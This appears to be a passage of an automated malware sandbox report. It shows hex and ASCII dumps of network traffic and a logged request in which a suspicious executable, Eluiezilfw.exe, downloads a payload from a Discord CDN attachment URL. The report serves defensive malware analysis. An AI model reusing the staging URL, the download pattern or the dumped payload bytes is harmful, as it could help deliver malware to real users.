                                2022-06-26 07:43:09 UTC454INData Raw: e9 14 f5 14 f9 14 09 14 11 14 15 14 19 14 1d 14 21 14 25 5f 29 5f 2d 5f 31 5f 35 5f 39 5f 3d 5f 41 5f 45 5f 49 5f 4d 5f 51 5f 55 5f 59 5f 5d 5f 61 5f 65 5f 69 5f 6d 5f 71 5f 75 5f 79 5f 7d 5f 81 5f 85 5f 89 5f 8d 5f 91 5f 95 5f 99 5f 9d 5f a1 5f a5 5f a9 5f ad 5f b1 5f bf 5f d1 5f df 5f e3 5f f5 5f c4 5f 19 5f 29 16 39 16 41 16 45 16 49 16 4d 16 51 16 55 16 59 16 5d 16 61 16 65 16 69 16 6d 16 71 16 75 16 79 16 7d 16 81 16 85 16 89 16 8d 16 91 16 95 16 99 16 9d 16 a1 16 a5 16 a9 16 ad 16 b1 16 b5 16 b9 16 bd 16 c1 16 c5 16 c9 16 cd 16 d1 16 d5 16 d9 16 dd 16 e1 16 e5 16 e9 16 ed 16 f1 16 f5 16 f9 16 09 16 d0 16 d4 16 31 61 51 61 59 61 5d 61 61 61 65 61 69 61 6d 61 71 61 75 61 79 61 7d 61 81 61 85 61 89 61 8d 61 91 61 95 61 a1 61 c1 61 c9 61 cd 61 d1 61 d5
                                Data Ascii: !%_)_-_1_5_9_=_A_E_I_M_Q_U_Y_]_a_e_i_m_q_u_y_}_____________________)9AEIMQUY]aeimquy}1aQaYa]aaaeaiamaqauaya}aaaaaaaaaaaa
                                2022-06-26 07:43:09 UTC458INData Raw: 4e ac 99 59 ea 38 a5 bb c7 46 ac 3f d9 43 18 a5 db c7 82 ac 26 0d 50 99 25 58 af b3 3e a5 ac 0c 33 8b b1 b4 3c 81 b1 62 20 85 64 7d 3f 4b a2 3b 3e c0 7d 10 7b 6a 10 3e f8 7d 12 9b f0 f6 e5 c3 3c ca 2d 49 27 66 a5 ee 11 2d 83 a9 35 e7 91 a7 b5 b5 22 7d 71 7d 1e cd 00 11 fe d9 37 df 2d 32 e4 5e a9 0c e7 02 47 6e cd 2a d9 00 9f 37 d4 e9 9d 87 5f 8c b5 7d 6b d1 4b 13 fc 43 fc c3 00 83 02 33 ee 3a 6e 6d 49 33 a4 b7 09 73 2f fc 00 b5 57 24 e6 24 46 6d b6 6d 08 c9 2e c9 63 f7 35 44 c1 71 4b c6 b5 48 a4 03 09 2d d7 a5 d1 45 72 6c 92 b5 ea b5 2a b7 d6 a4 9e 09 92 39 5f a0 ad 07 71 e4 c7 49 77 c9 b9 37 6f 10 40 1a c0 29 80 7a 57 67 74 c5 cf 2c a8 84 c3 f9 2d cf ad 5f 7a 7f 24 48 c5 9b 75 0a 2e 62 84 ee 59 50 bf 00 a8 76 3b 1e a6 c9 08 7e b0 f5 bf 44 42 44 d2 8d 0a
                                Data Ascii: NY8F?C&P%X>3<b d}?K;>}{j>}<-I'f-5"}q}7-2^Gn*7_}kKC3:nmI3s/W$$Fmm.c5DqKH-Erl*9_qIw7o@)zWgt,-_z$Hu.bYPv;~DBD
                                2022-06-26 07:43:09 UTC461INData Raw: fc 57 57 f7 82 f9 23 51 2d e9 c7 0c 6f ad c7 ad 7b 86 00 16 56 e0 6c 6c 6c 63 e6 c8 ba 25 15 7f ee ac ac 2c 39 3b d3 d2 df 10 2a 31 85 37 86 fe 10 10 b0 25 f1 e0 19 21 12 88 ee 95 1f 2e e7 2b c1 e2 cb d8 22 35 f3 d6 0c eb da 27 d6 1a b6 1a de 25 6d ce 17 f3 d8 ac e7 61 25 25 25 25 24 20 73 69 d3 67 85 a7 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25
                                Data Ascii: WW#Q-o{Vlllc%,9;*17%!.+"5'%ma%%%%$ sig%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
                                2022-06-26 07:43:09 UTC465INData Raw: 4d 41 ff e3 b7 a0 66 07 74 70 3c e9 ac ac 6b c4 02 a2 ed 7f 9a 72 c7 f9 b1 bb cc b1 d2 34 bd ee e0 cd ba 96 60 60 66 43 40 f3 67 fe 13 9a a3 82 99 b2 44 d7 fb ca 00 fb bd ed c9 23 ef fa 71 93 5b 76 44 8f 8f 17 56 d9 46 d3 01 9c c1 bd 85 b7 0b 80 be 1d ce 5f 7a e2 2d 55 33 e9 75 38 fd 91 9b 53 3a e3 71 22 a2 78 ec b6 1d a5 2f 1e c5 e8 02 6a 0e 06 79 45 fc 5b 64 03 86 98 41 84 0d f6 dc c5 1f 14 98 1f 51 f1 f6 12 93 c5 4d 57 0c 0c 0c be 73 f5 48 92 be dd 7b 66 4c 5c c3 cb ae 42 94 ff f2 e7 07 30 20 e9 3f ee a2 7d 3b 45 e9 35 a5 ae c4 09 f9 84 2e 29 e0 44 6d 24 24 cc 5f 3c 2a 2a ea 40 40 40 c9 8f 38 11 84 df 65 3a 69 57 4a 91 fd 5d 91 c3 e5 33 15 83 e6 ce 07 a0 66 f9 b0 b0 87 8e b4 a4 ef ef 67 82 e6 80 90 d0 2f c2 f3 78 82 90 90 70 68 f6 ba 49 49 89 3f 00 00
                                Data Ascii: MAftp<kr4``fC@gD#q[vDVF_z-U3u8S:q"x/jyE[dAQMWsH{fL\B0 ?};E5.)Dm$$_<**@@@8e:iWJ]3fg/xphII?
                                2022-06-26 07:43:09 UTC469INData Raw: 23 2c e3 0c 24 3b 6c 3d 5d 92 98 80 1b 5c 28 ae 7d 6b 39 42 18 25 2e 30 47 29 12 fe af 54 63 0e cb 46 23 71 a3 31 ce 07 b3 cd 8f c1 66 cf d7 98 c4 28 73 e0 e0 dc 5c db 12 aa 05 46 f5 5b fb 60 24 36 21 59 be 19 06 5b dd d7 1e 65 55 6c aa 37 4c 66 21 d4 ec a8 f6 ef fb fd 8b ea a2 73 7f 55 4d 2e a1 9c 4d 2e bd a5 02 d2 e1 9b 20 c7 1a b9 bb ab fd 73 f3 80 42 94 09 ff 6f ca b9 18 f0 c9 5f 81 92 52 4b 75 dc e9 52 35 0f e0 61 09 78 79 f0 af 00 89 0a a4 68 16 7d f3 cd 18 fe 62 46 b9 51 9f ef be a4 49 0c 2e 4b 27 53 36 53 be bc 76 22 b7 cd 3e 0f b0 e7 c9 8b a8 b2 6e 9f 65 69 13 c7 00 85 c6 e0 51 82 3d 43 37 ad 0f d1 33 97 f2 ab d5 8f 00 16 f5 5f 44 89 3a 09 70 3a a5 e5 af 08 9c f1 5e 43 f8 e5 d3 5c 4f ba ed 6e 4c 84 d9 f2 07 78 46 3c 62 07 a1 1f 68 a6 fc 4e a0 02
                                Data Ascii: #,$;l=]\(}k9B%.0G)TcF#q1f(s\F[`$6!Y[eUl7Lf!sUM.M. sBo_RKuR5axyh}bFQI.K'S6Sv">neiQ=C73_D:p:^C\OnLxF<bhN
                                2022-06-26 07:43:09 UTC473INData Raw: 68 b7 0e 54 96 1f 6a b3 8d 2c 6c b1 29 ff d4 ec d7 47 31 95 47 5c fd 81 12 24 01 78 f4 44 c4 2b c7 ff 91 89 e3 4c 4e 75 9d b3 7f 73 41 8f be 07 92 d5 c3 37 99 35 eb 97 6f c4 f7 4c b6 6f 07 a4 11 79 e8 7c 07 5f b8 da 2c ea 16 d1 75 76 4b af 03 f4 92 26 69 ff bf 66 6a a2 1d eb c9 4e d3 1b 25 0c d8 cf 9a 84 41 e5 30 38 65 db 4d fb 16 5c bd 53 7f 59 74 04 d3 5f 5d 56 22 95 b6 86 20 82 f7 ea 84 ed 15 fd cf 50 79 63 3b 00 53 08 c9 d5 88 ad 1b de 76 98 85 a2 73 97 dd 5c f5 03 71 cd cb 8b 3f ff 23 24 82 ba 34 e9 0f 11 02 a9 de 6b d0 d3 2e fa 76 85 5a c1 5b 1d 4e b5 e4 55 3e 71 ef a5 da 4d f4 92 9c 01 9d 0c de 09 55 ae e6 23 d4 8b cf 19 88 28 30 26 76 b4 55 8f 2b 21 e9 e9 fb dc f8 8f 86 d0 d5 f4 4d 8c a2 ea 9f 67 6c 43 3d 10 05 8a 3e e9 b1 3a f0 97 95 fa 8a 3f 4f
                                Data Ascii: hTj,l)G1G\$xD+LNusA75oLoy|_,uvK&ifjN%A08eM\SYt_]V" Pyc;Svs\q?#$4k.vZ[NU>qMU#(0&vU+!MglC=>:?O
                                2022-06-26 07:43:09 UTC477INData Raw: 39 dc 7e 73 79 c2 4b 51 dc 98 33 f8 48 e4 e1 62 e4 9e 3f 72 45 27 04 4e 05 31 69 a4 15 c2 1e 11 1d 78 50 60 9d df fc 8d 08 2f 4a 80 5d 0c a5 d0 9d 46 11 19 9f 59 68 16 49 89 7e 3a ea 4f c3 11 79 f1 68 d7 9d ef 70 10 10 df 8f 5e d7 bf 08 b0 6d 7c 34 d3 49 4f 88 dd ae 12 c3 23 a3 54 e7 82 09 89 f5 df 1f ba 58 56 cb 64 12 3a 3c b6 75 6f 03 59 62 be 28 5c 08 32 bf 8f f5 05 4e 22 5f 81 25 83 d1 66 ee 90 95 f7 ce 42 b1 ad 3d c4 75 ba 04 aa 11 69 c4 35 7a 88 06 e0 5d 73 ac 33 79 58 3d 28 61 b5 3c 72 c5 e7 bf 56 60 b9 b1 a2 f5 b6 8e b0 6e 29 f2 18 25 b7 52 2d 3f fa 52 cf 5e f3 c1 08 b0 0a 0d 4f 17 7e 8a 04 a2 c5 70 1d bc 0a ec 34 52 44 50 e8 df 8b 09 b2 ca 98 ea b8 01 86 6e f6 d7 22 b1 9a 69 9c d2 c5 9f cc f1 a1 52 47 5e 44 61 30 60 2c f9 df 6f 87 18 bb bd 2d 65
                                Data Ascii: 9~syKQ3Hb?rE'N1ixP`/J]FYhI~:Oyhp^m|4IO#TXVd:<uoYb(\2N"_%fB=ui5z]s3yX=(a<rV`n)%R-?R^O~p4RDPn"iRG^Da0`,o-e
                                2022-06-26 07:43:09 UTC482INData Raw: 62 34 71 ee d1 8f e9 8e 05 6e 12 41 57 67 df b1 60 d2 2c ad 8d c9 94 ad 9d dc 2e 3a e4 8b df 52 b0 d5 57 18 85 4f 94 c3 89 81 57 ee e2 43 8a 01 21 cb bb 34 b3 39 9e 1a 52 fc 0a 69 12 f6 5b ec 01 e2 99 a1 42 da ea 57 e4 f4 9a b9 5a 2c 7d 3f 6d 22 8d 0b 5e 83 44 fd e3 47 6f ae 65 a3 24 8f fe 51 04 78 77 64 33 2e 81 48 d0 8d ee fd 53 2a 4a 41 e7 7a 01 f0 de 9b 6a 17 18 6d 3c 75 6d 3a ec b6 99 1f 49 00 23 e6 69 b1 bc 42 27 ec fe c2 b8 c8 7f 9c 39 e2 7b 66 f8 c7 60 8b 01 02 2a f4 11 d3 a8 e5 81 eb e9 47 be 6c ba a9 2a 8c 1a e2 60 11 04 a2 3b 69 39 4d d1 e3 70 3b 8e d7 78 67 e5 c5 f3 69 65 48 e2 ec 23 f2 59 93 bd 7b 07 c2 75 48 d4 ca 3c 72 b9 2b fb ca 34 e4 c9 f2 e9 4b a0 ee 1d 0b b9 37 c3 ec 2d 9a fc a3 12 fd a8 16 4c 4e d0 3e 36 3e 6a 85 3a 4e 7b 45 03 4b aa
                                Data Ascii: b4qnAWg`,.:RWOWC!49Ri[BWZ,}?m"^DGoe$Qxwd3.HS*JAzjm<um:I#iB'9{f`*Gl*`;i9Mp;xgieH#Y{uH<r+4K7-LN>6>j:N{EK
                                2022-06-26 07:43:09 UTC486INData Raw: e8 64 21 81 90 ce 85 4a 79 4f 53 c9 ea 03 40 6f b6 c1 db 05 be a7 0c 50 f8 fe 68 1d 32 28 fc eb 46 68 39 75 0e 60 6b a7 6f 57 e8 f3 a9 1c 24 05 7b 10 30 d3 c7 87 90 b3 27 22 43 fc 4a b5 b3 f1 a4 b0 f6 93 5a 3a f6 e7 5a 0c 3e 5e 11 78 f0 8a 20 d6 b5 6c 43 af cd d7 5c 0e 08 1c 17 9c 3b ca 59 7f 4d 6d 12 d3 25 59 6f c3 6d 48 92 d2 8b eb 8c 7d d0 1f 6e 81 af 15 d9 f5 23 0b a7 af 81 28 f5 ea 24 0f 30 38 1f 14 8a 6a e8 d2 f4 60 74 85 dd 38 2e b2 a8 df d7 ee d3 ad ac 9c 67 1d 24 bb eb 8f 35 71 d9 d0 31 10 0d c3 34 57 54 36 e5 67 af 91 5e 1e 61 4c 2e fe 95 5c 3a 32 f5 8a d3 8c 83 7d e8 50 a2 04 02 94 66 f3 05 20 18 84 58 2f 9b 87 1b 58 62 fc 72 91 cf 2f 4c 6f cc 77 b4 62 62 4d 4d 3c fc 49 88 5e 83 92 b2 c7 80 44 cf 5e ec 02 ce 74 0d 27 29 76 4d d7 07 be 45 23 fc
                                Data Ascii: d!JyOS@oPh2(Fh9u`koW${0'"CJZ:Z>^x lC\;YMm%YomH}n#($08j`t8.g$5q14WT6g^aL.\:2}Pf X/Xbr/LowbbMM<I^D^t')vME#
                                2022-06-26 07:43:09 UTC490INData Raw: 67 ef 43 5b 46 45 59 48 27 19 fb a7 c8 3e 02 dd 7c 96 2a 86 5c fc 9f f1 ac fb 32 48 fd 6f f1 8f 0e 4e cf 9d 06 ab 74 80 3c b8 12 14 17 ab 26 0c db de 86 bc 66 11 cd 7b e5 83 ff e6 b0 57 2a 2e 59 66 0f 89 79 1b 1e cb 53 1e 45 28 e4 3e f2 2f 13 4a 6b 75 6c ec 44 88 e7 bd 2e 27 e8 e3 27 01 70 fb 57 a1 49 75 67 35 9d 23 7b ad ea 69 45 69 ce 82 b9 3b c3 2e 18 7f 9e f7 2e 87 3d 3c 87 e6 6e 9f 11 27 59 73 01 ae 58 f3 9d 9b e9 05 06 16 d2 f7 c6 14 8e bb 0c d9 39 76 0d ed 42 5a 23 d7 68 b5 4b 65 6b ce e5 ae fe 10 db ca 9a f2 54 a9 e4 47 a9 18 8c ed cc 95 f4 9e 35 35 9c 19 69 e1 74 a2 87 71 9a 3c 2a c7 28 80 43 8c 2b a3 db 1e f1 23 67 22 2d be 5c b1 db 58 b9 28 6e 52 ec fc 36 57 2b 89 3c 95 44 ff a8 ef 42 8e 1a ee a0 52 28 8d f3 c5 de a0 b7 a2 d9 1b 5e 8b 8a bd b5
                                Data Ascii: gC[FEYH'>|*\2HoNt<&f{W*.YfySE(>/JkulD.''pWIug5#{iEi;..=<n'YsX9vBZ#hKekTG55itq<*(C+#g"-\X(nR6W+<DBR(^
                                2022-06-26 07:43:09 UTC493INData Raw: bb 8f a0 bf 0f b5 5d e1 01 30 8c 8d 5f 28 29 03 97 5f 6a 03 bd e6 f7 5a da cc 91 5a 8f c9 2e 46 f0 3d ee 84 4b 32 eb 96 9f 92 41 81 ec 14 32 fd 7a 38 49 41 f6 57 65 16 2a 3d 5e 6d 16 84 b2 99 4f f5 37 88 5c f8 62 07 a9 49 a2 75 81 04 f0 ae 0f b1 cf 9e 06 4b 63 b3 93 7b 10 5a 8e ad 32 a3 1b 78 c9 84 b6 53 1a d6 31 43 19 8b 18 7e c9 ff 0e b7 96 fd 66 f6 2a a9 5a 99 5c 24 2e 66 53 4a 03 e1 95 e4 97 0f be 43 3a 9c cf 32 e0 7f a8 33 e6 65 6d 11 dc 5f 98 74 2f 92 7a 70 00 7c cb 95 bf b0 d8 ce 75 a8 7e fa 61 3c c0 a3 9e 24 90 7d 83 98 9e ff 1a 1f 46 62 17 18 14 d1 32 92 79 27 ff bf 57 73 28 f6 89 93 d3 dc b7 51 26 00 a4 d6 16 d8 21 bb 8c 81 d0 fd 16 1a e1 f0 17 bf 28 b1 b7 7d e8 73 c2 f3 a3 56 01 d6 e5 31 b7 90 a0 ca 30 58 9e 7c f9 02 c1 f1 42 8a ab 7b 12 b1 bb


                                Session ID: 3
                                Source IP: 192.168.2.3
                                Source Port: 49751
                                Destination IP: 162.159.134.233
                                Destination Port: 443
                                Process: C:\Users\Public\Libraries\Eluiezilfw.exe
                                Timestamp | kBytes transferred | Direction | Data
                                2022-06-26 07:43:17 UTC | 605 | OUT | GET /attachments/990482594137251863/990489253987360768/Eluiezilfwmdrgrdfrqpnwmurrnwnhm HTTP/1.1
                                User-Agent: 91
                                Host: cdn.discordapp.com
                                Cache-Control: no-cache
                                2022-06-26 07:43:17 UTC | 606 | IN | HTTP/1.1 200 OK
                                Date: Sun, 26 Jun 2022 07:43:17 GMT
                                Content-Type: application/octet-stream
                                Content-Length: 279040
                                Connection: close
                                CF-Ray: 72144fa56c9abbf8-FRA
                                Accept-Ranges: bytes
                                Age: 29
                                Cache-Control: public, max-age=31536000
                                Content-Disposition: attachment;%20filename=Eluiezilfwmdrgrdfrqpnwmurrnwnhm
                                ETag: "7d74af495b07aad93486870343b767e3"
                                Expires: Mon, 26 Jun 2023 07:43:17 GMT
                                Last-Modified: Sun, 26 Jun 2022 05:30:40 GMT
                                Vary: Accept-Encoding
                                CF-Cache-Status: HIT
                                Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                x-goog-generation: 1656221440589477
                                x-goog-hash: crc32c=Xt3y7g==
                                x-goog-hash: md5=fXSvSVsHqtk0hocDQ7dn4w==
                                x-goog-metageneration: 1
                                x-goog-storage-class: STANDARD
                                x-goog-stored-content-encoding: identity
                                x-goog-stored-content-length: 279040
                                X-GUploader-UploadID: ADPycdvxBSrtOJadICrFNKKLfO89NiJC2XolLUl9l7gh0iKGSgrZ72iFb7WGAL9LAxlO6pTzoCsdjuJYzhz5OOHW7aIxBA
                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Bz2kShRpzLwKS4ZtLOj0Ms49yEh%2FSKUnFhePRt89dT9Cv%2B%2BkZk1W%2BVQkrY51uF7Zgn3%2FpfA7jRe8VrAjvkfAKxK9EMAgHz8q43XjQ4%2FST7fvXB2G4xAK5w%2BZ9zpdpo6M6n4jSQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                Data Ascii: ^.{d(d0d !^X%P/d %% ^X!%%%%%%%f01WkP-^%%%^ESf09Wkf`%%%P-^%%%\%%%+ff09Wkf`h%%%\%%%+f(!d9f0!d1geP-N )f mf0!)g%%"P-Ngf09WkUP-NE9f09
                                2022-06-26 07:43:17 UTC628INData Raw: 7c c1 e5 1c 25 75 0d 68 da da da 7f 36 9e 66 e5 dd 31 25 25 25 60 e5 99 fa 0d 87 da da da 7e c1 e5 1c 25 0d bd da da da 7c c1 e5 1c 25 75 0d 38 da da da 7e 99 0b 1c 25 9e 68 65 25 2c dd 31 25 25 25 60 e5 99 4b 5e 18 c1 e5 1c 25 da 99 f8 7c c1 e5 1c 25 75 0d 5b da da da 64 29 49 5e 61 49 25 99 e4 66 29 49 75 0d 31 da da da 7f 9e 66 e5 dd 31 25 25 25 60 e5 99 f4 0d e3 da da da 5e 18 c1 e5 1c 25 da 99 e6 7c c1 e5 1c 25 75 0d 1b 23 da da 9e b5 af e8 89 0b 1c 25 7c c1 e5 1c 25 a9 a4 50 4b 89 66 f0 51 25 25 25 66 29 a7 9e 0d e8 da da da 7c c1 e5 1c 25 75 0d f7 23 da da 60 e5 99 dc 9e 7c 99 0b 1c 25 9e 75 0d 9c 23 da da 60 e5 99 b6 9e dd c5 e5 1c 25 0d 9b d2 da da 9e b5 df c5 e5 1c 25 5e 58 31 dc 50 4f 75 77 eb e0 89 0b 1c 25 dc 66 28 2d 64 e8 8d 0b 1c 25 64 6f
                                Data Ascii: |%uh6f1%%%`~%|%u8~%he%,1%%%`K^%|%u[d)I^aI%f)Iu1f1%%%`^%|%u#%|%PKfQ%%%f)|%u#`|%u#`%%^X1POuw%f(-d%do
                                2022-06-26 07:43:17 UTC630INData Raw: 1d 64 20 21 66 28 1d 1c 66 20 21 66 f0 25 35 65 25 0d 88 09 da da 66 20 19 0d ac b8 da da 0e e5 30 8d 9f 42 65 25 89 da 55 89 64 45 eb 20 ce 25 66 50 1d 6b 73 60 1b a1 55 6b 0e da 66 38 21 66 20 19 0d dd b8 da da 75 66 de 0d d5 b8 da da 75 0d 67 23 da da 60 e5 50 e4 66 20 2d 64 5d eb 20 ce dc 22 5e 9e 29 73 50 fb 0e e5 7f 34 34 89 64 35 8d 5c 42 65 25 68 20 19 0d 9c fd da da 66 20 21 66 28 1d 1c 66 f0 25 35 65 25 0d ce 07 da da 9e c4 e0 f7 da da c6 03 af 20 ce 66 58 09 66 50 0d 66 38 11 66 c0 38 e7 29 25 b5 0e f7 84 25 25 25 29 99 2b 5c ef 25 27 25 25 84 25 25 25 45 99 08 84 25 25 25 65 99 ec 84 25 25 25 a5 99 e0 5e ef 65 c6 1c 5e ef 45 c6 61 84 25 25 25 a5 99 2d 5c ef a5 25 25 25 c6 08 5e ef 35 66 e7 9e 84 25 25 25 65 99 ec 84 25 25 25 a5 99 e0 5e ef 29
                                Data Ascii: d !f(f !f%5e%f 0Be%UdE %fPks`Ukf8!f ufug#`Pf -d] "^)sP44d5\Be%h f !f(f%5e% fXfPf8f8)%%%%)+\%'%%%%%E%%%e%%%^e^Ea%%%-\%%%^5f%%%e%%%^)
                                2022-06-26 07:43:17 UTC631INData Raw: 35 8d 83 91 65 25 68 20 19 66 f0 41 8b 65 25 0d ef b8 da da 9e c4 4d a8 da da c6 0f 66 20 05 3a 83 36 66 c0 38 9e 30 66 11 0e e5 30 8d 68 91 65 25 89 da 55 89 64 45 da e0 a5 0b 1c 25 0e e5 7f 34 34 89 64 35 8d b9 91 65 25 9e c4 17 f1 da da c6 1d 38 9e 66 e5 5e 08 a5 0b 1c 25 dc 9e 8d 0b 1c 25 15 da 25 25 8d 0b 1c 25 cc da 25 25 8d 0b 1c 25 17 da 25 25 8d 0b 1c 25 ce da 25 25 8d 0b 1c 25 19 da 25 25 8d 0b 1c 25 d0 da 25 25 8d 0b 1c 25 1b da 25 25 8d 0b 1c 25 d2 da 25 25 8d 0b 1c 25 1d da 25 25 8d 0b 1c 25 d4 da 25 25 8d 0b 1c 25 1f da 25 25 8d 0b 1c 25 d6 da 25 25 8d 0b 1c 25 21 da 25 25 8d 0b 1c 25 d8 da 25 25 8d 0b 1c 25 23 da 25 25 8d 0b 1c 25 da da 25 25 8d 0b 1c 25 05 da 25 25 8d 0b 1c 25 bc da 25 25 8d 0b 1c 25 07 da 25 25 8d 0b 1c 25 be da 25 25 8d
                                Data Ascii: 5e%h fAe%Mf :6f80f0he%UdE%44d5e%8f^%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%!%%%%%%#%%%%%%%%%%%%%%%%%
                                2022-06-26 07:43:17 UTC632INData Raw: 25 25 25 25 25 f1 4c 65 25 35 25 25 25 4d 4c 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 37 20 20 9d 99 40 97 93 3c 91 20 9d 3e 40 95 99 44 4a 93 b5 51 97 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 51 97 65 25 35 25 25 25 4d 4c 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 e4 20 24 93 99 20 97 97 4a 97 66 e5 a9 97 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 a9 97 65 25 35 25 25 25 05 4c 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 2f 20 69 44 9b 67 54 7f 40 97 4a b5 01 97 65 25 25 25 25 25 25 25
                                Data Ascii: %%%%%Le%5%%%MLe%[e%[e%[e%[e%[e%YYe%uYe%Ye%7 @< >@DJQe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Qe%5%%%MLe%[e%[e%[e%[e%[e%YYe%uYe%Ye% $ Jfe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%e%5%%%Le%[e%[e%[e%[e%[e%YYe%uYe%Ye%/ iDgT@Je%%%%%%%
                                2022-06-26 07:43:17 UTC634INData Raw: d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 33 20 2e 99 3c 3e 46 2a 9b 40 97 8b 91 4a 52 b5 95 52 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 95 52 65 25 35 25 25 25 4d 4c 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 e4 20 1e 4a 93 99 97 4a 91 1e 66 e5 ed 52 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 ed 52 65 25 31 25 25 25 d5 4a 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 e8 20 7b 3c 97 44 3c 93 99 20 97 97 4a 97 66 e5 49 9d 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25
                                Data Ascii: [e%[e%[e%[e%[e%YYe%uYe%Ye%3 .<>F*@JRRe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Re%5%%%MLe%[e%[e%[e%[e%[e%YYe%uYe%Ye% JJfRe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Re%1%%%Je%[e%[e%[e%[e%[e%YYe%uYe%Ye% {<D< JfIe%%%%%%%%%%%%%%%%%%%%%%%%
                                2022-06-26 07:43:17 UTC635INData Raw: 32 2e 64 eb 64 b2 e4 e5 99 de 66 65 21 e4 f7 99 de 66 77 21 64 9c 14 ac 9b 27 64 ac 14 a4 ce cb 99 4f af 83 da a5 d6 3c 97 2d a5 d6 9f 52 de a5 c6 45 af 5a da a5 da 3c 97 2d a5 da 9f 52 de a5 ca 45 5d d6 99 fd ea db 9e ea db b2 04 f5 36 3a 83 9e b5 14 f5 99 f4 e4 e5 99 f2 e4 f7 99 39 66 6d 21 16 6f 21 50 31 0d 6e da da da 60 e5 50 de d5 dc 9e 0c e5 9e b5 2e 7b 66 17 66 fd 66 eb 0d f2 eb da da 75 66 eb 0d ea ed da da 75 66 9e 0d e2 eb da da 75 66 9e 0d da a2 da da 75 8f 25 8d 25 29 25 25 0d 87 0b da da 5e 0d 27 83 36 9e 2e 7b 66 17 66 fd 66 eb 0d ba a0 da da 75 66 eb 0d b2 a2 da da 75 66 9e 0d aa a0 da da 75 66 9e 0d a2 a2 da da 75 8f dc 8d 25 29 25 25 0d 4f 0b da da 5e 0d 27 83 36 9e 2e 7b 66 17 66 fd 66 fb 66 9e 0d 94 da da da 60 e5 ea b9 e5 83 36 9e b5
                                Data Ascii: 2.ddfe!fw!d'dO<-REZ<-RE]6:9fm!o!P1n`P.{fffufufufu%%)%%^'6.{fffufufufu%)%%O^'6.{ffff`6
                                2022-06-26 07:43:17 UTC636INData Raw: 9c 1c 25 75 66 29 90 6d 9c 1c 25 75 66 a2 0d 0a 9e da da 75 0d 94 bc da da 3a 83 36 9e b5 2e 66 fd 8f 25 8d a5 25 25 25 8f 27 8f 25 8f 25 8d 25 25 25 e5 66 9e 0d 2d 9e da da 75 0d b7 bc da da 36 9e 0d b2 da da da 9e 66 e5 2e 7b 32 2c 66 d4 66 17 66 fd 8f 25 68 69 49 29 75 32 7b 2e 0d a2 07 da da 60 e5 50 e2 a2 29 49 da da da da 66 29 49 7f 3a 83 36 9e 2e 7b 32 2c 66 d4 66 17 66 fd 8f 25 68 69 49 29 75 32 7b 2e 0d fe be da da 60 e5 50 e2 a2 29 49 da da da da 66 29 49 7f 3a 83 36 9e 30 66 11 5e e9 1d 2e 7b 66 17 66 fd 66 20 2d 64 20 1d 66 20 31 64 20 21 7b 68 20 21 75 66 20 1d 75 2e 0d 74 07 da da 64 20 1d 66 20 1d 66 30 21 83 36 34 34 38 e7 2d 25 75 0d ef 05 da da 9e b5 30 66 11 5c e9 d9 23 da da 2e 66 fd 68 60 d9 23 da da 75 66 9e 0d 6b e7 da da 75 0d 4d
                                Data Ascii: %uf)m%ufu:6.f%%%%'%%%%%f-u6f.{2,fff%hiI)u2{.`P)If)I:6.{2,fff%hiI)u2{.`P)If)I:60f^.{fff -d f 1d !{h !uf u.td f f0!6448-%u0f\#.fh`#ufkuM
